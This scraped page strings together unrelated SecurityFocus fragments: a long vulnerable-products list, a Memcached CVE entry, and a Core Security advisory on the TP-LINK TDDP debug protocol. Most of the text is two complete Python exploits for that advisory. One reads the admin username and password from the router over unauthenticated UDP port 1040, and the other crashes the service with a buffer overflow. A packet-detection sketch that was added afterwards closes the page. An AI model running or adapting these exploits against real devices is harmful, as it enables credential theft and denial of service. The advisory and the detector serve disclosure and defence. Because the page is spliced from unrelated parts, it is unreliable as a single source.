Overflow

Vulnerable: Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle Solaris 11.3
Oracle Solaris 10
Oracle Mysql 5.7.15
Oracle Mysql 5.7.14
Oracle Mysql 5.7.13
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.6.33
Oracle Mysql 5.6.32
Oracle Mysql 5.6.31
Oracle Mysql 5.6.30
Oracle Mysql 5.6.28
Oracle Mysql 5.6.27
Oracle Mysql 5.6.26
Oracle Mysql 5.6.25
Oracle Mysql 5.6.24
Oracle Mysql 5.6.23
Oracle Mysql 5.6.22
Oracle Mysql 5.6.21
Oracle Mysql 5.6.17
Oracle Mysql 5.6.12
Oracle Mysql 5.6.11
Oracle Mysql 5.6.10
Oracle Mysql 5.6.9
Oracle Mysql 5.6.6
Oracle Mysql 5.6
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.6.8
Oracle Mysql 5.6.7
Oracle Mysql 5.6.5
Oracle Mysql 5.6.4
Oracle Mysql 5.6.29
Oracle Mysql 5.6.20
Oracle Mysql 5.6.2
Oracle Mysql 5.6.19
Oracle Mysql 5.6.18
Oracle Mysql 5.6.16
Oracle Mysql 5.6.15
Oracle Mysql 5.6.14
Oracle Mysql 5.6.13
Oracle Enterprise Linux 5
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
McAfee ePolicy Orchestrator 5.1.2
McAfee ePolicy Orchestrator 5.1.1
McAfee ePolicy Orchestrator 5.1
McAfee ePolicy Orchestrator 5.3.2
McAfee ePolicy Orchestrator 5.3.1
McAfee ePolicy Orchestrator 5.3.0
McAfee ePolicy Orchestrator 5.1.3
IBM Vios 2.2
IBM Tivoli Provisioning Manager for OS Deployment 5.1.1 build 51.05
IBM Tivoli Provisioning Manager for OS Deployment 5.1 3 Intirim Fix 3
IBM Tivoli Provisioning Manager for OS Deployment 5.1 .3
IBM Tivoli Provisioning Manager for OS Deployment 5.1 .116
IBM Tivoli Provisioning Manager for OS Deployment 5.1
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.20 build 280.6
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.19
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1
IBM Tivoli Provisioning Manager for OS Deployment 5.1.Fix Pack 3
IBM Tivoli Provisioning Manager for OS Deployment 5.1.1 build 051.07
IBM Tivoli Provisioning Manager for OS Deployment 5.1.0.2
IBM Tivoli Provisioning Manager for Images System x Edition 7.1.1.0
IBM Tivoli Provisioning Manager for Images 7.1.1.20 build 280.6
IBM Tivoli Provisioning Manager for Images 7.1.1.19
IBM Tivoli Provisioning Manager for Images 7.1.1.0
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM Integrated Management Module (IMM) for System x YUOO
IBM Integrated Management Module (IMM) for BladeCenter YUOO
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - SSL Gateway 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway for Microsoft Hyper-V 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified Wireless IP Phone 0
Cisco Unified SIP Proxy Software 0
Cisco Unified SIP Proxy 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise - Live Data server 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Standard 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco Unified Attendant Console 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco Telepresence System 3000 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence System TX9000
Cisco TelePresence System 500-37
Cisco TelePresence System 500-32
Cisco TelePresence System 1100
Cisco TelePresence System 1000
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director (formerly Flow Replicator) 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA51x IP Phones 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business SPA500 Series IP Phones 0
Cisco Small Business SPA300 Series IP Phones 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Small Business 300 Series 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Optical 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime LAN Management Solution 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Physical Access Gateways 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco OnePK All-in-One VM 0
Cisco onePK All-in-One Virtual Machine 0
Cisco One Portal 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 3000 Series Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Nexus 1000V InterCloud for VMware 0
Cisco Nexus 1000V InterCloud 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco Mobility Services Engine 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Lancope Stealthwatch FlowCollector sFlow 0
Cisco Lancope Stealthwatch FlowCollector NetFlow 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco Jabber 0
Cisco IronPort Email Security Appliance 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco IOS XR Software 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Intelligent Automation for Cloud 0
Cisco Identity Services Engine 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Emergency Responder
Cisco Email Security Appliance (ESA) 0
Cisco Email Security Appliance 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Management Appliance 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Connected Analytics For Collaboration 0
Cisco Configuration Professional 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security (CWS) 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco Broadband Access Center Telco and Wireless 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application Networking Manager (ANM) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco AnyConnect Secure Mobility Client 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Agent Desktop
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 500 Series Stackable 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0
CentOS CentOS 7


SecurityFocus Vulnerabilities

Memcached Multiple Integer Overflow Vulnerabilities

Bugtraq ID: 94083
Class: Boundary Condition Error
CVE: CVE-2016-8704
CVE-2016-8705
CVE-2016-8706
Remote: Yes
Local: No
Published: Oct 31 2016 12:00AM
Updated: Nov 23 2016 04:08AM
Credit: Aleksandar Nikolic of Cisco Talos
Vulnerable: Memcached memcached 1.4.31
Not Vulnerable:


SecurityFocus Vulnerabilities

1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of its devices with a debugging protocol enabled by default. The protocol listens on UDP port 1040 on the LAN interface.

Vulnerabilities were found in the implementation of this protocol that could lead to remote code execution and information leak (credentials acquisition).

4. Vulnerable Devices

TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of its hardware with a debugging service activated by default. This service uses a custom protocol. Vulnerabilities were found in this protocol that could lead to remote code execution or information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, no authentication is in place. Additionally, if the message handler accepts the "Get configuration" message type, the program leaks the web interface configuration file, which includes the web login credentials.

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
    structure = (
        ('version','B=0x1'),
        ('type','B=0'),
        ('code','B=0'),
        ('replyInfo','B=0'),
        ('packetLength','>L=0'),
        ('pktID','<H=1'),
        ('subType','B=0'),
        ('reserved','B=0'),
        ('payload',':=""'),
    )
    def printPayload(self):
        print self.getPayloadAsString()

    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s

class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5

    GET_PRODUCT_ID = 10

    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1
        return tddp

    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp

    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp

class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)

    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")

        v = v.replace("\r", "")
        v = v.replace("\n", "")

        return k,v

    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)

        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]

            self.__dict__[k] = real_value
            self.__key_order.append(k)

    def __str__(self):
        cfg = []
        cfg.append(self.Header)

        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value

            line = "%s %s" % (k, str_value)

            cfg.append(line)

        str_cfg = "\r\n".join(cfg)

        return str_cfg

class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()

    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)

    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)

    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)

    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)

    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)

    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)

HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd

7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an extensive configuration file and forcing version 1 in the packet.

The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To reestablish the TDDP service the device must be restarted:

import socket
import re
import string
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
    structure = (
        ('version','B=0x1'),
        ('type','B=0'),
        ('code','B=0'),
        ('replyInfo','B=0'),
        ('packetLength','>L=0'),
        ('pktID','<H=1'),
        ('subType','B=0'),
        ('reserved','B=0'),
        ('payload',':=""'),
    )
    def printPayload(self):
        print self.getPayloadAsString()

    def getPayloadAsString(self):
        s=''
        for i in range(len(self['payload'])):
            s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
        return s

class TDDPRequestsPacketBuilder(object):
    SET_CONFIG = 1
    GET_CONFIG = 2
    CMD_SYS0_PR = 3
    GET_SERIAL_NUMBER = 5

    GET_PRODUCT_ID = 10

    def getRequestPacket(self):
        tddp = TDDP()
        tddp['version'] = 1
        tddp['replyInfo'] = 1
        return tddp

    def getConfigPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + 'all'
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def setConfigPacket(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.SET_CONFIG
        tddp['payload'] = ('\x00'*0x10) + trail
        tddp['packetLength'] = len(tddp['payload'])
        return tddp

    def getSerialNumberPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_SERIAL_NUMBER
        return tddp

    def getProductIDPacket(self):
        tddp = self.getRequestPacket()
        tddp['type'] = self.GET_PRODUCT_ID
        return tddp

    def CMD_SYS0_PR_Packet(self, trail):
        tddp = self.getRequestPacket()
        tddp['type'] = self.CMD_SYS0_PR
        tddp['replyInfo'] = 2
        tddp['payload'] = ('\x00'*0x10)
        tddp['packetLength'] = len(tddp['payload'])
        tddp['payload'] += trail
        return tddp

class TPLINKConfig(object):
    def __init__(self, aConfig):
        self.__parseConfig(aConfig)

    def __sanitizeKeyValue(self, k, v):
        k = k.replace("\r", "")
        k = k.replace("\n", "")

        v = v.replace("\r", "")
        v = v.replace("\n", "")

        return k,v

    def __parseConfig(self, aConfig):
        self.__key_order = []
        self.Header = aConfig[:0x10]
        pending = aConfig[0x10:]
        k_v = re.findall("(.*?) (.*)", pending)

        for k, v in k_v:
            k,v = self.__sanitizeKeyValue(k,v)
            real_value = v.split(" ")
            if len(real_value) == 1:
                real_value = real_value[0]

            self.__dict__[k] = real_value
            self.__key_order.append(k)

    def __str__(self):
        cfg = []
        cfg.append(self.Header)

        for k in self.__key_order:
            value = self.__dict__[k]

            if not isinstance(value, basestring):
                str_value = " ".join(value)
            else:
                str_value = value

            line = "%s %s" % (k, str_value)

            cfg.append(line)

        str_cfg = "\r\n".join(cfg)

        return str_cfg

class TDDPSessionV1(object):
    def __init__(self, ip, port=1040):
        self.ip = ip
        self.port = port
        self.req_buidler = TDDPRequestsPacketBuilder()

    def send(self, aPacket):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.conn.sendto(str(aPacket), (self.ip, self.port))
        self.conn.close()

    def recv(self, n):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.bind(('', 61000))
        data, addr = udp.recvfrom(n)
        return TDDP(data)

    def _send_and_recv(self, packet, n):
        self.send(packet)
        return self.recv(n)

    #####################################
    def getConfig(self):
        c_packet = self.req_buidler.getConfigPacket()
        return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

    def getSerialNumber(self):
        c_packet = self.req_buidler.getSerialNumberPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def getProductID(self):
        c_packet = self.req_buidler.getProductIDPacket()
        return self._send_and_recv(c_packet, 50000).getPayloadAsString()

    def setInitState(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
        return self._send_and_recv(c_packet, 50000)

    def save(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
        self._send_and_recv(c_packet, 50000)

    def reboot(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
        self._send_and_recv(c_packet, 50000)

    def clr_dos(self):
        c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
        self._send_and_recv(c_packet, 50000)

    def setConfig(self, aConfig):
        c_packet = self.req_buidler.setConfigPacket(str(aConfig))
        self._send_and_recv(c_packet, 50000)

class Exploit(TDDPSessionV1):
    def run(self):
        c_packet = self.req_buidler.getRequestPacket()
        c_packet['type'] = self.req_buidler.SET_CONFIG
        c_packet['payload'] = "A"*325
        c_packet['packetLength'] = 0x0264
        return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040
s = Exploit(HOST)
s.run()
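
For monitoring a LAN segment where affected devices cannot be replaced, the traffic described in sections 7.1 and 7.2 can be recognized from the 12-byte header alone. The following is an added detection sketch in Python 3, not part of the Core Security advisory: it parses the header layout and message-type numbers shown in the PoC and tags v1 requests to UDP port 1040. The tag names, the `scan` record format and the sample datagrams (with documentation-range source addresses) are constructed for illustration.

```python
import struct
from collections import namedtuple

TDDP_PORT = 1040                     # UDP port named in the advisory
HEAD = struct.Struct(">BBBBL")       # version, type, code, replyInfo, packetLength
TAIL = struct.Struct("<HBB")         # pktID (little-endian in the PoC), subType, reserved
HEADER_LEN = HEAD.size + TAIL.size   # 12 bytes precede the payload

# Message type numbers as listed in the advisory's PoC.
SET_CONFIG, GET_CONFIG, CMD_SYS0_PR = 1, 2, 3
GET_SERIAL_NUMBER, GET_PRODUCT_ID = 5, 10

TddpV1 = namedtuple(
    "TddpV1",
    "version type code reply_info packet_length pkt_id sub_type reserved payload",
)


def parse_tddp(data):
    """Return a TddpV1 tuple, or None when the datagram is shorter than the header."""
    if len(data) < HEADER_LEN:
        return None
    head = HEAD.unpack_from(data, 0)
    tail = TAIL.unpack_from(data, HEAD.size)
    return TddpV1(*head, *tail, data[HEADER_LEN:])


def inspect_datagram(dst_port, data):
    """Tag one UDP payload; an empty list means nothing of interest."""
    if dst_port != TDDP_PORT:
        return []
    pkt = parse_tddp(data)
    if pkt is None:
        return ["short-header"]
    if pkt.version != 1:
        return []  # the advisory only documents the v1 layout
    tags = ["v1-request"]  # v1 is the unauthenticated path (section 7.1)
    if pkt.type == GET_CONFIG:
        tags.append("v1-get-config")   # configuration and credential disclosure
    elif pkt.type == SET_CONFIG:
        tags.append("v1-set-config")   # message type involved in section 7.2
    # A declared length that disagrees with the bytes on the wire is a
    # signal worth reviewing, not proof of an attack on its own.
    if pkt.packet_length != len(pkt.payload):
        tags.append("length-mismatch")
    return tags


def scan(records):
    """records: iterable of (src_ip, dst_port, udp_payload). Returns [(src_ip, tags)]."""
    alerts = []
    for src, dst_port, payload in records:
        tags = inspect_datagram(dst_port, payload)
        if tags:
            alerts.append((src, tags))
    return alerts


def sample_datagram(mtype, declared_len, payload, version=1):
    """Build a constructed datagram for the samples below (no network I/O)."""
    return HEAD.pack(version, mtype, 0, 1, declared_len) + TAIL.pack(1, 0, 0) + payload


# Constructed samples; field values mirror the requests described in sections 7.1 and 7.2.
SAMPLES = [
    ("192.0.2.10", 1040, sample_datagram(GET_CONFIG, 19, b"\x00" * 16 + b"all")),
    ("192.0.2.10", 1040, sample_datagram(SET_CONFIG, 0x0264, b"A" * 325)),
    ("192.0.2.11", 1040, sample_datagram(GET_SERIAL_NUMBER, 0, b"")),
    ("192.0.2.12", 53, b"\x01\x02"),            # other port: ignored
    ("192.0.2.13", 1040, b"\x01\x02\x00"),      # too short to be a TDDP header
]

if __name__ == "__main__":
    for src, tags in scan(SAMPLES):
        print(src, ",".join(tags))
```

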